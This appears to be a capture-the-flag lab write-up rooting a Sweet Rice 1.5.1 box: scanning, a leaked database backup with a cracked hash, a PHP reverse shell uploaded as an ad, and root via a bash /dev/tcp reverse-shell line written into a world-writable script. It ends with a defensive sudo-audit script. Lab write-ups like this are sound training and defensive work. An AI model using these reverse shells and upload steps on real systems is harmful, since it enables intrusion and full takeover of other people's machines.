Room Covers:

  • Service Discovery
  • Finding Vulnerabilities
  • Exploitation
  • Privilege Escalation

Target Details

  • IP: 10.10.209.190

Service Discovery

  • Using nmap

    nmap -sV -sC -Pn -oN nmap.txt 10.10.209.190
    
  • Services Discovered

    Service   Port   Version
    SSH       22     OpenSSH 7.2p2
    HTTP      80     Apache httpd 2.4.18
  • Finding Directories on HTTP server using GoBuster

    gobuster dir -u http://10.10.209.190/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt
    

    Directories Discovered: /content

  • On visiting the /content page, we see that the server is running the Sweet Rice CMS (a basic CMS)

Finding Vulnerabilities

  • First vulnerability: visiting /content/inc/mysql_backup/ exposes an SQL database backup file, from which we get a username and password hash; the hash can be cracked easily with online tools such as CrackStation

    username   password hash                      password
    manager    42f749ade7f9e195bf475f37a44cafcb   Passwordxxx

    We don't know the login page yet!

  • Moving to the parent directory /content/inc/, we get a directory listing of all the files, including /content/inc/lastest.txt, which reveals the Sweet Rice version: 1.5.1

  • Searching for Sweet Rice 1.5.1 vulnerabilities in a search engine leads to a file upload vulnerability

  • Reading the exploit, the admin page is given as /as, but on this target the admin page is at a different location: /content/as

  • Visit /content/as and log in with the admin credentials found above

  • We can add custom PHP code from the ADS tab

  • TL;DR

    Service            Vulnerability
    Sweet Rice         Backup Disclosure
    Sweet Rice 1.5.1   File Upload
       

Exploitation

  • Create a malicious advertisement containing a reverse shell

  • Using the PentestMonkey PHP reverse shell template, change the ip variable to the attacker's VPN IP, then upload it as an ad to get shell access

  • Start listener using netcat

    nc -nlvp 1234
    
  • From /content/inc/ads/ we can execute the uploaded reverse shell

  • We have access to the shell

    listening on [any] 1234 ...
    connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312
    Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
     11:43:09 up  1:26,  0 users,  load average: 0.83, 0.30, 0.10
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    

Privilege Escalation

  • Finding Escalation Vectors

    $ sudo -l
    Matching Defaults entries for www-data on THM-Chal:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User www-data may run the following commands on THM-Chal:
        (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
    
    

    We can run /home/itguy/backup.pl under perl as root, without a password

  • Victim’s shell

    # overwrite contents of /etc/copy.sh (world-writable, run by backup.pl) with a reverse shell on port 4444
    echo "/bin/bash -c 'exec bash -i &>/dev/tcp/[ATTACKER_VPN_IP]/4444 <&1'" > /etc/copy.sh
    
    # on attacker's machine start netcat listener session on port 4444
    # nc -nlvp 4444
    
    # execute reverse shell with sudo rights
    sudo /usr/bin/perl /home/itguy/backup.pl
    
  • Root Shell on Attacker’s machine

    nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 52812
    bash: cannot set terminal process group (1058): Inappropriate ioctl for device
    bash: no job control in this shell
    root@THM-Chal:/#
    
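As an added defensive check, not part of the original write-up: the script below parses the `sudo -l` output shown above and flags a NOPASSWD rule whose target script, or any file that script names, is writable by group or others. It builds a constructed throwaway root directory mirroring the box; the body of backup.pl is hypothetical, since the write-up only shows that it runs /etc/copy.sh.

```python
import os, re, stat, tempfile

RULE_RE = re.compile(r"^\s*\(\S+\)\s+NOPASSWD:\s+(?P<cmd>.+)$")
PATH_RE = re.compile(r"(?<![\w.])/[\w./-]+")  # absolute paths in text

def parse_nopasswd_rules(sudo_l_output):
    """Return the command part of every '(runas) NOPASSWD: cmd' line."""
    return [m.group("cmd").strip() for m in
            (RULE_RE.match(l) for l in sudo_l_output.splitlines()) if m]

def writable_by_others(path):
    """True if the group or world write bit is set on the file."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_rule(cmd, root="/"):
    """Check each absolute path in the command, then paths named inside any
    readable script it points at (backup.pl -> /etc/copy.sh); return writable ones."""
    findings, seen, queue = [], set(), PATH_RE.findall(cmd)
    while queue:
        path = queue.pop()
        if path in seen:
            continue
        seen.add(path)
        real = os.path.join(root, path.lstrip("/"))
        if not os.path.isfile(real):
            continue  # e.g. /bin/sh is not present in the audited tree
        if writable_by_others(real):
            findings.append(path)
        with open(real, errors="ignore") as fh:
            queue.extend(PATH_RE.findall(fh.read()))
    return findings

# Constructed input: the 'sudo -l' rule from the box, verbatim
SUDO_L = """User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
"""

def demo():
    """Build a fake root mirroring the box and audit it. backup.pl's body is a
    hypothetical stand-in; only its call to /etc/copy.sh is known from the box."""
    root = tempfile.mkdtemp()
    script = os.path.join(root, "home/itguy/backup.pl")
    hook = os.path.join(root, "etc/copy.sh")
    for p in (script, hook):
        os.makedirs(os.path.dirname(p), exist_ok=True)
    with open(script, "w") as fh:  # root-owned, 0755: not itself writable
        fh.write('system("/bin/sh", "/etc/copy.sh");\n')
    os.chmod(script, 0o755)
    with open(hook, "w") as fh:    # world-writable helper: the real flaw
        fh.write("echo backup\n")
    os.chmod(hook, 0o777)
    return {cmd: audit_rule(cmd, root) for cmd in parse_nopasswd_rules(SUDO_L)}
```

The fix this check points at is to make /etc/copy.sh root-owned and mode 0755 (or drop the NOPASSWD rule), after which `demo()` would report no writable paths.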

Get Flags

  • User Flag

    cat /home/itguy/user.txt
    # THM{63e5bce9271952xxxxxxxxxxxxxxxxxx}
    
  • Root Flag

    cat /root/root.txt
    # THM{6637f41d0177bxxxxxxxxxxxxxxxxxxx}